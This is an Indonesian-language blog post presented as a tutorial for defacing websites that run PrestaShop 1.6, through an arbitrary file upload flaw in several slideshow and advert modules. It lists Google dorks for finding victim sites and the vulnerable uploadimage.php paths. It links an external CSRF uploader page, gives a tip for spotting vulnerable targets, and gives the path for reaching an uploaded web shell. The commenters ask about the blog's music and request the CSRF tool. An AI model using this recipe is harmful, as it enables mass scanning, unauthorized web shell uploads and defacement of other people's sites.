Searching...
Saturday, August 20, 2016

Tutorial Deface Menggunakan PrestaShop - Responsive Prestashop 1.6 Arbitrary File Upload

Saturday, August 20, 2016


Dork :  


inurl:"/modules/columnadverts/"


inurl:"/modules/homepageadvertise/"


inurl:"/modules/productpageadverts/"


inurl:"/modules/simpleslideshow/"


inurl:"/modules/homepageadvertise2/"


inurl:"/modules/vtemslideshow/"



Gak VULN ? cari target lain lah :v dork nya kembanginnn ... bisa tambah in site:

Exploit :

/modules/columnadverts/uploadimage.php



/modules/homepageadvertise/uploadimage.php



/modules/productpageadverts/uploadimage.php



/modules/simpleslideshow/uploadimage.php



/modules/homepageadvertise2/uploadimage.php



/modules/vtemslideshow/uploadimage.php


csrf exploiter pretashop = http://m2d.asia/csrfpretashop/

ciri ciri vuln ada tulisan error kalo User Not Login engga vuln :D

akses shellnya = targetlu/modules/namapretashopnya/slides/namashellu.php
























3 comments:

  1. Halo masbro ... tolong beritahu list lagu dari pemutar musik nya semua donk
    dari awal sampe akhir ya :v

    salam dari dbt

    ReplyDelete
    Replies
    1. lagu pertama Alan Walker vs Coldplay - Hymn For The Weekend [Remix] lagu kedua nya sing me to sleep ke 3 don't let me down ke 4 dan seterusnya lupa :D

      Delete
  2. Csrfny pak buatin :(

    ReplyDelete